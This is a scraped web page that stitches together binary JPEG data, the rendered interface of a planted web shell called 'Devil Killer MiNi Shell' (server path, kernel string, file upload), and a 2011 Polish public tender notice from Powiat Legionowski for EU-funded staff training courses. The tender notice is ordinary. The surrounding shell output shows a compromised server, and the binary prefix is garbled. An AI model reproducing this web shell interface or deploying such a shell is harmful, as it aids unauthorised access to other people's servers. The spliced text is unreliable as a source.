JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111114/295819-N-2011.html

<p class="kh_header"><b>Legionowo: szkolenia dla pracowników Starostwa Powiatowego 
współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet V Dobre rządzenie, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1.</b><br>
<b>Numer ogłoszenia: 295819 - 2011; data zamieszczenia: 14.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Legionowski , ul. gen. Władysława Sikorskiego 11, 05-119 Legionowo, woj. mazowieckie, tel. 22 7840872, faks 22 7742551.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-legionowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> szkolenia dla pracowników Starostwa Powiatowego 
współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet V Dobre rządzenie, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> świadczenie usługi polegającej na zorganizowaniu i przeprowadzeniu szkoleń dla pracowników Starostwa Powiatowego w Legionowie.
Przedmiot zamówienia został podzielony na dwie części.
OFERTA CZĘŚCIOWA  NR 1 ZAMÓWIENIA
W ramach realizacji oferty częściowej nr 1 zamówienia Wykonawca zobowiązany jest zorganizować i przeprowadzić trzy niżej wymienione szkolenia:
Szkolenie nr 1 - SPRAWNE ZARZĄDZANIE W STAROSTWIE
Wykonawca zobowiązany jest:
1) zorganizować i przeprowadzić szkolenie, które będzie obejmowało swoim zakresem następujące zagadnienia:
sesja 1 - Budowanie i zarządzanie zespołem;
sesja 2 - Planowanie i organizacja czasu pracy;
sesja 3 - Komunikacja w zespole;
sesja 4 - Motywowanie i coaching; 
sesja 5 - Twórcze rozwiązywanie konfliktów;
sesja 6 - Umiejętności kierownicze, menedżerskie;
Szkolenie będzie prowadzone w formie wykładów i warsztatów, przy czym wykłady będą stanowiły nie więcej niż 20% czasu sesji szkoleniowej; warsztaty powinny być prowadzone z wykorzystaniem następujących technik: studia przypadku, ćwiczenia, dyskusje oraz ewentualnie innych technik zaproponowanych przez Wykonawcę;
2) przeszkolić 20 osób należących do kadry kierowniczej Starostwa; uczestnicy szkolenia zostaną podzieleni na dwie grupy po 10 osób każda; rekrutację uczestników szkolenia przeprowadzi Zamawiający (Zamawiający przekaże Wykonawcy listę uczestników szkolenia nie później niż 5 dni przed datą sesji szkoleniowej);
3) dokonać doprecyzowania szczegółowych potrzeb szkoleniowych w ramach każdej sesji  szkoleniowej wymienionej w pkt 1 na podstawie opracowanych przez Wykonawcę narzędzi badawczych (np. ankiety, rozmowy z uczestnikami, rozmowy z przełożonymi uczestników szkolenia);
4) przedstawić Zamawiającemu szczegółowy harmonogram poszczególnych sesji szkoleniowych, treść i formę materiałów szkoleniowych oraz wzór certyfikatu ukończenia szkolenia w terminie nie później niż 14 dni od daty pierwszej sesji szkoleniowej; Zamawiający w terminie 3 dni od otrzymania propozycji ww. dokumentów dokonana ich zatwierdzenia lub zgłosi ewentualne uwagi;
5) uwzględnić uwagi Zamawiającego, o których mowa w pkt 4 i przekazać w ciągu 3 dni poprawione dokumenty wymienione w pkt 4 do ponownego zatwierdzenia przez Zamawiającego;
6) zapewnić odpowiednie wyposażenie techniczne pomieszczeń, w których szkolenie będzie prowadzone oraz zapewnić w czasie trwania szkolenia warunki odpowiadające przepisom z zakresu bezpieczeństwa i higieny pracy;
7) zapewnić uczestnikom szkolenia usługi restauracyjne i hotelarskie w dniach, w których szkolenie będzie prowadzone;
8) przygotować i rozdać uczestnikom szkolenia na każdej sesji szkoleniowej materiały szkoleniowe w języku polskim (wydruk jedno lub dwustronny prezentacji w układzie 2 slajdów na stronie) wraz z notatnikiem; materiały szkoleniowe należy oznaczyć logo Programu Operacyjnego Kapitał Ludzki, godłem powiatu legionowskiego, logo Unii Europejskiej wraz z informacją o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego (zasady umieszczania informacji o współfinansowaniu oraz logotypy znajdują się w Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki opublikowanych na stronie: www.efs.gov.pl w zakładce dokumenty oraz w Planie promocji projektu opublikowanym na stronie www.powiat-legionowski.pl w zakładce Kapitał Ludzki; odbiór materiałów szkoleniowych i notatnika zostanie potwierdzony na piśmie przez każdego uczestnika;
9) udokumentować przebieg szkolenia w dzienniku zajęć, którego wzór zostanie opracowany przez Zamawiającego, który będzie zawierał co najmniej: nazwę projektu, nazwę szkolenia, datę rozpoczęcia i zakończenia każdej sesji szkoleniowej, tematy zajęć zrealizowanych w każdym dniu szkolenia, listę obecności uczestników szkolenia w każdym dniu sesji szkoleniowej, imię i nazwisko oraz podpis trenera prowadzącego szkolenie; Wykonawca zobowiązany jest przekazać Zamawiającemu oryginał dziennika zajęć wraz z listami obecności podpisanymi w każdym dniu szkolenia przez uczestników szkolenia; przekazanie ww. dokumentów będzie podstawą rozliczenia faktury;
10) wystawić i rozdać uczestnikom imienne certyfikaty ukończenia poszczególnych sesji szkoleniowych (warunkiem uzyskania certyfikatu będzie obecność w trakcie obu dni sesji szkoleniowej, potwierdzona podpisami uczestnika na listach obecności), certyfikaty należy oznaczyć logo Programu Operacyjnego Kapitał Ludzki, godłem powiatu legionowskiego, logo Unii Europejskiej wraz z informacją o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego (zasady umieszczania informacji o współfinansowaniu oraz logotypy znajdują się w Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki opublikowanych na stronie: www.efs.gov.pl w zakładce dokumenty oraz w Planie promocji projektu opublikowanym na stronie www.powiat-legionowski.pl w zakładce Kapitał Ludzki; odbiór certyfikatu zostanie potwierdzony na piśmie przez każdego uczestnika; kopie certyfikatów poświadczonych za zgodność z oryginałem przez Wykonawcę należy dołączyć do faktury; przekazanie kopii certyfikatów będzie podstawą rozliczenia faktury;
11) określić stopień osiągnięcia rezultatu szkolenia, tj. określić w % o ile wzrósł potencjał kadry kierowniczej Starostwa w zakresie zarządzania zespołem - w oparciu o zaproponowane przez Wykonawcę narzędzia badawcze (np. ankiety, pre i post testy przeprowadzone przed pierwszą i po ostatniej sesji szkoleniowej); badaniem należy objąć 100% uczestników szkolenia.
Harmonogram i warunki techniczne przeprowadzenia szkolenia
1) Sesja szkoleniowa dla jednej grupy będzie trwała 2 dni po 8 godzin dydaktycznych dziennie (nie wliczając przerw).
2) Szkolenia będą odbywać się w czasie dwóch kolejno następujących po sobie dni roboczych. Przez dzień roboczy Zamawiający rozumie dzień od poniedziałku do piątku (bez dni ustawowo wolnych od pracy).
3) Sesje szkoleniowe będą prowadzone w salach szkoleniowych zlokalizowanych w hotelach o standardzie, co najmniej 3-gwiazdkowym lub w ośrodkach konferencyjno-szkoleniowych odpowiadających standardem hotelowi, co najmniej 3-gwiazdkowemu zgodnie z wytycznymi zawartymi w  rozporządzeniu Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie ( Dz. U.  z 2006 r. Nr 22 poz. 169). Hotel/ośrodek, w którym odbędzie się szkolenie, musi być zlokalizowany w odległości ok. 60 km od siedziby Starostwa; miejsce przeprowadzenia szkolenia zostanie wskazane przez Wykonawcę w ofercie.
4) Sale szkoleniowe muszą spełniać następujące warunki:
a) liczba miejsc w sali musi być odpowiednia do wielkości grupy;
b) sala musi być klimatyzowana/ogrzewana w celu zapewnienia optymalnej temperatury w trakcie szkolenia nie mniej niż 20°C nie więcej niż 23°C;
c) posiadać dzienne oświetlenie i otwierane okna;
d) posiadać wyposażenie w sprzęt multimedialny adekwatny do zaproponowanych przez Wykonawcę technik przeprowadzenia szkolenia.
5) Wykonawca zapewni:
a) wyżywienie dla wszystkich uczestników szkolenia obejmujące: co najmniej jedną przerwę kawową każdego dnia szkolenia (kawa, herbata, soki, woda, ciastka, owoce), obiad każdego dnia szkolenia (zupa, dwa dania główne do wyboru, deser oraz herbata, kawa, woda, soki), uroczystą kolację w pierwszym dniu sesji szkoleniowej oraz śniadanie w formie bufetu w drugim dniu sesji szkoleniowej. Miejsce wydawania posiłków musi znajdować się w tym samym obiekcie, w którym będą odbywały się szkolenia, w oddzielnym pomieszczeniu, niż sala szkoleniowa;
b) jeden nocleg dla wszystkich uczestników szkolenia z pierwszego na drugi dzień sesji szkoleniowej w hotelu lub ośrodku konferencyjno - szkoleniowym, w którym realizowane będą sesje szkoleniowe (w pokojach jednoosobowych i dwuosobowych, z tym, że Wykonawca zapewni co najmniej 4 pokoje jednoosobowe).
Wynagrodzenie za przeprowadzenie szkolenia
1) Za zrealizowanie zamówienia wykonawca otrzyma wynagrodzenie ryczałtowe zgodnie z ofertą Wykonawcy.
2) Płatność następować będzie po zakończeniu każdego etapu szkolenia (etap I przeprowadzenie - trzech pierwszych sesji szkoleniowych dla obu grup szkoleniowych, etap II - przeprowadzenie kolejnych dwóch sesji szkoleniowych dla obu grup szkoleniowych, etap III - przeprowadzenie szóstej sesji szkoleniowej dla obu grup szkoleniowych), na podstawie protokołu odbioru danego etapu, w terminie 14 dni od otrzymania faktury.
3) Zamówienie w 100% finansowane jest ze środków publicznych.

Szkolenie nr 2 UMIEJĘTNOŚCI INTERPERSONALNE DLA EFEKTYWNEJ WSPÓŁPRACY z INTERESANTAMI i INNYMI JEDNOSTKAMI SAMORZĄDU TERYTORIALNEGO

Szkolenie nr 3 - PRACA ZESPOŁOWA W JEDNOSTCE SAMORZĄDU TERYTORIALNEGO

 OFERTA CZĘŚCIOWA NR 2 ZAMÓWIENIA
W ramach realizacji zamówienia wykonawca zobowiązany jest:
1) zorganizować i przeprowadzić szkolenie MARKETING i PR W JEDNOSTCE SAMORZĄDU TERYTORIALNEGO, które będzie obejmowało swoim zakresem następujące zagadnienia:
Sesja 1 -Promocja
Sesja 2-Podstawy marketingu
Sesja 3-Public Relations;
szkolenie będzie prowadzone w formie wykładów i warsztatów. Warsztaty powinny być prowadzone z wykorzystaniem następujących technik: studia przypadku, ćwiczenia, dyskusje oraz ewentualnie innych technik zaproponowanych przez Wykonawcę;
2) przeszkolić 30 pracowników Starostwa; uczestnicy szkolenia zostaną podzieleni na 2 grupy po 15 osób każda; rekrutację uczestników szkolenia przeprowadzi Zamawiający;(Zamawiający przekaże Wykonawcy listę uczestników szkolenia nie później niż 5 dni przed datą sesji szkoleniowej);
3) dokonać doprecyzowania szczegółowych potrzeb szkoleniowych w ramach każdej sesji szkoleniowej wymienionej w pkt 1 na podstawie opracowanych przez Wykonawcę narzędzi badawczych (np. ankiety, rozmowy z uczestnikami, rozmowy z przełożonymi uczestników szkolenia);
4) przedstawić Zamawiającemu szczegółowy harmonogram poszczególnych sesji szkoleniowych, treść i formę materiałów szkoleniowych oraz wzór certyfikatu ukończenia szkolenia w terminie nie później niż 14 dni od daty pierwszej sesji szkoleniowej; Zamawiający w terminie 3 dni od otrzymania propozycji ww. dokumentów dokonana ich zatwierdzenia lub zgłosi ewentualne uwagi;
5) uwzględnić uwagi Zamawiającego, o których mowa w pkt 4 i przekazać w ciągu 3 dni poprawione dokumenty wymienione w pkt 4 do ponownego zatwierdzenia przez Zamawiającego;
6) zapewnić odpowiednie wyposażenie techniczne pomieszczeń, w których szkolenie będzie prowadzone oraz zapewnić w czasie trwania szkolenia warunki odpowiadające przepisom z zakresu bezpieczeństwa i higieny pracy;
7) zapewnić uczestnikom szkolenia usługi restauracyjne i hotelarskie w dniach, w których szkolenie będzie prowadzone;
8) przygotować i rozdać uczestnikom szkolenia materiały szkoleniowe w języku polskim w wersji papierowej (wydruk jedno lub dwustronny wszystkich prezentacji w układzie 2 slajdów na stronie) oraz na płycie CD wraz z notatnikiem; materiały szkoleniowe należy oznaczyć logo Programu Operacyjnego Kapitał Ludzki, godłem powiatu legionowskiego, logo Unii Europejskiej wraz z informacją o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego (zasady umieszczania informacji o współfinansowaniu oraz logotypy znajdują się w Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki opublikowanych na stronie: www.efs.gov.pl w zakładce dokumenty oraz w Planie promocji projektu opublikowanym na stronie www.powiat-legionowski.pl w zakładce Kapitał Ludzki; do materiałów szkoleniowych należy dołączyć notatnik; odbiór materiałów szkoleniowych i notatnika zostanie potwierdzony na piśmie przez każdego uczestnika;
9) udokumentować przebieg szkolenia w dzienniku zajęć według wzoru opracowanego przez Zamawiającego, który będzie zawierał co najmniej: nazwę projektu, nazwę szkolenia, datę rozpoczęcia i zakończenia każdej sesji szkoleniowej, tematy zajęć zrealizowanych w każdym dniu szkolenia, listę obecności uczestników szkolenia w każdym dniu sesji szkoleniowej, imię i nazwisko oraz podpis trenera prowadzącego szkolenie; Wykonawca zobowiązany jest przekazać Zamawiającemu oryginał dziennika zajęć wraz z listami obecności podpisanymi w każdym dniu szkolenia przez uczestników szkolenia; przekazanie ww. dokumentów będzie podstawą rozliczenia faktury;
10) wystawić i rozdać uczestnikom imienne certyfikaty ukończenia poszczególnych sesji szkoleniowych (Zamawiający przekaże Wykonawcy listę uczestników szkolenia w terminie 5 dni przed datą sesji szkoleniowej; warunkiem uzyskania certyfikatu będzie obecność w trakcie obu dni sesji szkoleniowej, potwierdzona podpisami uczestnika na listach obecności), certyfikaty należy oznaczyć logo Programu Operacyjnego Kapitał Ludzki, godłem powiatu legionowskiego, logo Unii Europejskiej wraz z informacją o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego (zasady umieszczania informacji o współfinansowaniu oraz logotypy znajdują się w Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki opublikowanych na stronie: www.efs.gov.pl w zakładce dokumenty oraz w Planie promocji projektu opublikowanym na stronie www.powiat-legionowski.pl w zakładce Kapitał Ludzki; odbiór certyfikatu zostanie potwierdzony na piśmie przez każdego uczestnika; kopie certyfikatów poświadczonych za zgodność z oryginałem przez Wykonawcę należy dołączyć do faktury; przekazanie kopii certyfikatów będzie podstawą rozliczenia faktury.
Harmonogram i warunki techniczne przeprowadzenia szkolenia
1) Sesja szkoleniowa dla jednej grupy będzie trwała 2 dni po 8 godzin dydaktycznych dziennie (nie wliczając przerw).
2) Szkolenia będą odbywać się w czasie dwóch kolejno następujących po sobie dni roboczych. Przez dzień roboczy Zamawiający rozumie dzień od poniedziałku do piątku (bez dni ustawowo wolnych od pracy).
3) Sesje szkoleniowe będą prowadzone w salach szkoleniowych zlokalizowanych w hotelach o standardzie co najmniej 3-gwiazdkowym lub w ośrodkach konferencyjno-szkoleniowych odpowiadających standardem hotelowi co najmniej 3-gwiazdkowemu zgodnie z wytycznymi zawartymi w  rozporządzeniu Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów , w których są świadczone usługi hotelarskie ( Dz. U.  z 2006 r. Nr 22 poz. 169). Hotel/ośrodek, w którym odbędzie się szkolenie, musi być zlokalizowany w odległości ok. 60 km od siedziby Starostwa; miejsce przeprowadzenia szkolenia zostanie wskazane przez Wykonawcę w ofercie.
4) Sale szkoleniowe muszą spełniać następujące warunki:
a) liczba miejsc w sali musi być odpowiednia do wielkości grupy;
b) sala musi być klimatyzowana/ogrzewana w celu zapewnienia optymalnej temperatury w trakcie szkolenia nie mniej niż 20°C nie więcej niż 23°C ;
c) posiadać dzienne oświetlenie i otwierane okna;
d) posiadać wyposażenie w sprzęt multimedialny adekwatny do zaproponowanych przez Wykonawcę technik przeprowadzenia szkolenia.
5) Wykonawca zapewni:
a) wyżywienie dla wszystkich uczestników szkolenia obejmujące: co najmniej jedną przerwę kawową każdego dnia szkolenia (kawa, herbata, soki, woda, ciastka, owoce), obiad każdego dnia szkolenia (zupa, dwa dania główne do wyboru, deser oraz herbata, kawa, woda, soki), uroczystą kolację w pierwszym dniu sesji szkoleniowej oraz śniadanie w formie bufetu w drugim dniu sesji szkoleniowej. Miejsce wydawania posiłków musi znajdować się w tym samym obiekcie, w którym będą odbywały się szkolenia w oddzielnym pomieszczeniu, niż sala szkoleniowa;
b) jeden nocleg dla wszystkich uczestników szkolenia z pierwszego na drugi dzień sesji szkoleniowej w hotelu lub ośrodku konferencyjno - szkoleniowym, w którym realizowane będą sesje szkoleniowe (w pokojach jednoosobowych i dwuosobowych, z tym, że Wykonawca zapewni co najmniej 3 pokoje jednoosobowe).
Szczegółowy opis przedmiotu zamówienia w SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.30.00.00-3, 55.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania wiedzy i doświadczenia w zakresie zapewniającym realizację zamówienia, Zamawiający uzna jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), wykonał należycie (a w przypadku świadczeń okresowych lub ciągłych również wykonuje), co najmniej 5 kompleksowych usług szkoleniowych, z których każda polegała na zorganizowaniu i przeprowadzeniu szkolenia/warsztatu dla minimum 10 osób wraz z zapewnieniem noclegu i wyżywienia, trwającego co najmniej 16 godzin dydaktycznych (nie wliczając przerw)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia Zamawiający uzna, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował:
- 2 doświadczonymi trenerami/wykładowcami dla realizacji oferty częściowej nr 1 zamówienia,
- 1 doświadczonym trenerem/wykładowcą dla realizacji oferty częściowej nr 2 zamówienia.
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że każdy z trenerów/wykładowców przeprowadził co najmniej 5 szkoleń, w tym co najmniej jedno dla pracowników administracji publicznej, z zakresu:
- dla oferty częściowej nr 1 zamówienia - rozwijania umiejętności interpersonalnych,
- dla oferty częściowej  nr 2 zamówienia - marketingu i public relations.
Wykonawca wskazuje:
- w ofercie na realizację I części zamówienia dwóch trenerów/wykładowców, 
- w ofercie na realizację II części zamówienia jednego trenera/wykładowcę</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełnianiu warunków art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
